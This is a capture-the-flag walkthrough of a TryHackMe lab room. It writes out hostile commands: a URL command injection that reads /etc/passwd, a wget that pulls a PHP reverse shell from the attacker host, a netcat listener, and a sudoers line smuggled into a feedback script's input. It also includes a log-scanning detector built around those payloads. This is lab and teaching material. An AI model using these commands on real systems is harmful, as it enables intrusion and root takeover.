Use your ethical hacker powers to test the security of the Hero Academia U.A High School Website.
TryHackMe’s U.A. High School room is rated easy but requires creativity in your approach.
You can try out the room for yourself: https://tryhackme.com/r/room/yueiua
Tools required:
Penetration Testing O.S. - Kali or Parrot OS (or whichever security-focused O.S. you prefer)
Nmap
CyberChef: https://gchq.github.io/CyberChef/
PentestMonkey PHP Reverse Shell Script: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
HexEdit - to assist with viewing and editing a file with hidden data (steganography): sudo apt install hexedit
The room description hints that we must find and exploit web application/website vulnerabilities; most likely, the website is hosted on the default HTTP port 80. However, we must be thorough and enumerate any different and additional ports: sudo nmap -T4 -p- --min-rate 1000 <target_ip>
I find two ports, 22 (SSH) and 80 (HTTP), and a more detailed enumeration yields no helpful information. Take note of port 22; we will use it later.
The U.A. High School website is simple and does not hide anything interesting; the source code points to an assets directory, which could mean more hidden web directories.
When I fire up GoBuster, I do not find any additional directories beyond the assets directory, but when I enumerate that, I see an index.php script file.
gobuster dir -u http://<target_ip>/assets -w /usr/share/wordlists/dirb/common.txt -x .txt,.html,.php -b403,404
Accessing the index.php file does not display anything; PHP command injection?
Accessing this web address, http://<target_ip>/assets/index.php?cmd=pwd, I get the following base64 encoded text: L3Zhci93d3cvaHRtbC9hc3NldHMK
I prefer using CyberChef to encode or decode such text, but if you like the command line, you can decode base64 using the following command: echo "base64_encoded_text" | base64 -d
I decided to try and retrieve the Linux user file via http://<target_ip>/assets/index.php?cmd=cat%20/etc/passwd and confirm there is an interesting user/hero registered - deku. Based on previous THM boxes, I must elevate my initial access privileges to ‘deku’ and then to root.
TIP: you can try inspecting the index.php script using the following address - http://<target_ip>/assets/index.php?cmd=cat%20index.php. However, there is not much to exploit.
Time to get a reverse shell on the system; upload a PHP reverse shell script:
Download PentestMonkey PHP Reverse Script (PentestMonkey GitHub) and amend the required variables - IP and Port
Host the script on your attacker machine using the Python3 web server module - python3 -m http.server 8081
Access this address to upload/download the amended reverse PHP shell script on the U.A. High School target machine - http://<target_ip>/assets/index.php?cmd=wget%20http://<attacker_ip>:8081/rshell.php
Launch a Netcat listener based on the amended script variables - nc -nvlp 5445
Access the uploaded PHP reverse shell script - http://<target_ip>/assets/rshell.php
I now have access to the machine as a low-level user - www-data, and perform the usual manual enumeration. I am looking for a way to elevate my privileges to ‘deku.’ I did try using linPEAS but did not find anything useful that can be used to elevate my privileges.
I opt to review the directories/files on the system and find two files within the assets/images folder; I can view the yuie.jpg file but not the oneforall.jpg image file and decide to download and analyze it. The files can be transferred via Netcat (target machine) nc <attacker_ip> <netcat_port> < oneforall.jpg and (attacker machine) nc -nvlp <netcat_port> > oneforall.jpg
I can’t open the file on my machine, and further analysis reveals that it is recognized as a data file rather than a typical image file despite the initial file characters indicating that it is an image file.
I spent some time on Google and found that I can use HexEdit to view and edit files in hexadecimal or ASCII format. However, I needed to compare the oneforall.jpg file against another, working image file to identify its ‘incorrect’ hexadecimal characters.
Once I corrected these characters and saved the file, I retested the file and confirmed that it appeared as a JPG file.
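The hex-editor comparison above can be scripted. The following is an added example and is not code from the walkthrough or the room; it assumes the damage is confined to the leading JPEG marker bytes (SOI plus the JFIF APP0 segment header), which the walkthrough does not state explicitly, and the sample bytes are constructed for the demo rather than taken from oneforall.jpg.

```python
# Added example (not from the original walkthrough): classify the first bytes of a
# file that should be a JPEG, show them beside a known-good header the way a hex
# editor would, and rewrite the damaged leading bytes. Assumption: only the SOI
# marker and JFIF APP0 header were damaged; the rest of the file is intact.
from pathlib import Path

JPEG_SOI = b"\xff\xd8"                         # Start Of Image marker
JFIF_APP0 = b"\xff\xe0\x00\x10JFIF\x00"        # APP0 marker, segment length 16, "JFIF\0" id
VALID_HEADER = JPEG_SOI + JFIF_APP0            # 11 bytes every baseline JFIF file begins with


def header_status(data: bytes) -> str:
    """Return 'ok', 'bad-soi', 'bad-app0' or 'too-short' for the given file bytes."""
    if len(data) < len(VALID_HEADER):
        return "too-short"
    if data[:2] != JPEG_SOI:
        return "bad-soi"
    # After SOI the next marker (APP0 for JFIF, APP1 for Exif) must start with 0xFF.
    if data[2] != 0xFF:
        return "bad-app0"
    return "ok"


def hexdump_head(data: bytes, n: int = 16) -> str:
    """Hex + ASCII view of the first n bytes, for a side-by-side comparison."""
    chunk = data[:n]
    hexpart = " ".join(f"{b:02x}" for b in chunk)
    asciipart = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
    return f"{hexpart:<{n * 3}} {asciipart}"


def repair_jfif_header(data: bytes) -> bytes:
    """Overwrite the first 11 bytes with the canonical SOI + JFIF APP0 header.

    This is the scripted equivalent of patching those bytes in HexEdit; it only
    helps when the leading marker bytes were damaged and everything else is intact
    (the JFIF version and density fields after byte 11 are left untouched).
    """
    if len(data) < len(VALID_HEADER):
        raise ValueError("file too short to be a JPEG")
    return VALID_HEADER + data[len(VALID_HEADER):]


def check_and_repair_file(path: str, write: bool = False) -> str:
    """Report the header status of a file on disk; optionally write the repaired bytes back."""
    p = Path(path)
    data = p.read_bytes()
    status = header_status(data)
    if status in ("bad-soi", "bad-app0") and write:
        p.write_bytes(repair_jfif_header(data))
    return status


# Constructed sample: a minimal JFIF header, version 1.1, no thumbnail, then EOI.
SAMPLE_GOOD = VALID_HEADER + b"\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\xff\xd9"
# Constructed damaged copy: the first four bytes carry another format's signature,
# so `file` would no longer recognise it as a JPEG.
SAMPLE_CORRUPT = b"\x89PNG" + SAMPLE_GOOD[4:]

if __name__ == "__main__":
    print("reference :", hexdump_head(SAMPLE_GOOD))
    print("suspect   :", hexdump_head(SAMPLE_CORRUPT), "->", header_status(SAMPLE_CORRUPT))
    fixed = repair_jfif_header(SAMPLE_CORRUPT)
    print("repaired  :", hexdump_head(fixed), "->", header_status(fixed))
```

Run it on a real file with check_and_repair_file("oneforall.jpg") first (no write) to see the status, and only pass write=True once the dump shows that just the leading bytes differ from a known-good JPEG; a file damaged deeper in the stream needs more than a header patch.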
Assuming this was a real-world situation, the most probable reason the image file was unreadable was that someone tried to hide information in it and messed up the encoding. Running steghide extract -sf oneforall.jpg, I am asked for a passphrase to view the hidden message.
Returning to my low-level shell, I find a hidden directory /var/www/Hidden_Content containing a base64 encoded passphrase.
I can now access the hidden message and retrieve Deku’s credentials by decoding the passphrase.
When I tried the credentials on the SSH port I found earlier, I was able to get a higher-level shell on the target machine and the first user flag.
I understand why this machine is rated easy: privilege escalation is pretty simple. Manual enumeration is all you need to find a quick and easy way via sudo -l which highlights an unusual file /opt/NewComponent/feedback.sh.
Deku is not a member of the sudoers club; we can use this script to change this and become the No. 1 hero. First, I need to change directories to the script’s folder, then execute the script using sudo, and finally, when I am asked for ‘feedback’ I can submit the following text - deku ALL=NOPASSWD: ALL >> /etc/sudoers
Now, when I check Deku’s permission, I can run everything as root and launch a new bash terminal using sudo /bin/bash to get the root flag.
I have not implemented or encountered public (or internal) servers that allow executing commands via a URL address. Regardless, this single flaw allows an attacker to gain low-level access to the machine. Once on the machine, it is only a matter of time before an attacker will find a way to elevate privileges.
Simple takeaway: DO NOT ALLOW command execution within web applications, regardless of whether this is via the URL address or internal application backend. I came across a similar issue when breaking into the VulnHub Butler machine that allowed command execution via the Jenkins Script Console (Walkthrough)
If it is absolutely required, secure it as best you can and regularly monitor its access and use.
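For the "monitor its access and use" part of that takeaway, and for the ?cmd= probing seen earlier on /assets/index.php, here is an added detection example. It is not code from the walkthrough or the room: it scans web-server access log lines in the common combined format and flags requests whose query string carries a command-style parameter or a shell-like value. The log lines, IP addresses and timestamps are constructed for the demo; the paths mirror the ones used on this box.

```python
# Added example (not from the original walkthrough): flag web requests that look
# like command execution through a URL parameter, run over constructed access-log
# lines in Apache/nginx "combined" format.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# ip - - [time] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Parameter names that should never carry a command in a sane application.
SUSPECT_PARAMS = {"cmd", "exec", "command"}

# Shell-like content: a common binary name at the start of the value or after a
# separator, sensitive file paths, or shell metacharacters.
SHELL_TOKENS = re.compile(
    r"(?:^|[\s;|&`$(])(?:cat|ls|id|whoami|pwd|wget|curl|nc|bash|sh|python\d?|rm|chmod)\b"
    r"|/etc/passwd|/etc/sudoers|[;|&`]|\$\("
)


def flag_request(path: str) -> list:
    """Return the reasons a request path looks like command execution (empty if clean)."""
    reasons = []
    query = urlsplit(path).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() in SUSPECT_PARAMS:
            reasons.append(f"command-style parameter {name!r}")
        for value in values:
            decoded = unquote(value)  # parse_qs decoded once; catch double-encoded payloads too
            if SHELL_TOKENS.search(decoded):
                reasons.append(f"shell-like value in {name!r}: {decoded!r}")
    return reasons


def scan(lines) -> list:
    """Parse log lines and return a finding per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        reasons = flag_request(m["path"])
        if reasons:
            findings.append(
                {"ip": m["ip"], "time": m["time"], "path": m["path"], "reasons": reasons}
            )
    return findings


# Constructed sample log: one client probes the cmd parameter, another browses normally.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /assets/index.php?cmd=pwd HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/May/2024:12:00:09 +0000] "GET /assets/index.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/May/2024:12:01:30 +0000] "GET /assets/index.php?cmd=wget%20http://10.0.0.5:8081/rshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/May/2024:12:02:00 +0000] "GET /assets/images/yuie.jpg HTTP/1.1" 200 55000 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/May/2024:12:02:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} {f['path']}")
        for r in f["reasons"]:
            print("   -", r)
```

Even the harmless-looking first probe (cmd=pwd) is flagged by the parameter name alone, which is the point: a web application that takes a command in a URL parameter should show up in monitoring on its first use, not only once /etc/passwd or a wget appears in the value. Feed real logs through scan() via sys.stdin or a file iterator; the parser skips lines that are not in combined format.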
Overall, the U.A. High School box was an exciting challenge, especially when finding unusual files and hidden messages.
Cover image: Generated with Microsoft Designer
Links to support articles and tools are included within the article.